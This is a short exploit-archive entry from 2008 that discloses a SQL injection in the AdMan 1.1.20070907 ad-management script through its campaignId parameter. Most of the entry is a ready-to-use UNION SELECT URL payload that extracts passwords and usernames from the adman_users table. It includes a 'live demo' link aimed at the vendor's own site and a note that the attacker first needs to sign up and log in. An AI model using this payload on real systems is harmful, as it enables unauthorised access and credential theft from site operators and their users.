id: 3857
date: 10/07/2008
title: AdMan 1.1.20070907 (campaignId) SQL Injection Vulnerability
author: SuB-ZeRo
cves: 

===========================================================
AdMan 1.1.20070907 (campaignId) SQL Injection Vulnerability
===========================================================


############### >>> Remote SQL Injection <<<  ###########
##                    SuB-ZeRo(Walid)                  ##
################## >>> SuB-ZeRo  <<< ####################
 author  :  SuB-ZeRo(algeria hackers)
                
 
 buy script : http://www.formfields.com/adManArea/adManPricing.php
dork    : find it
 exploit:
 www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 L!Ve DeMo  :::
 http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 NoTe:YoU must singup and login in web sit and you put your exploit



#  0day.today [2023-03-24]  #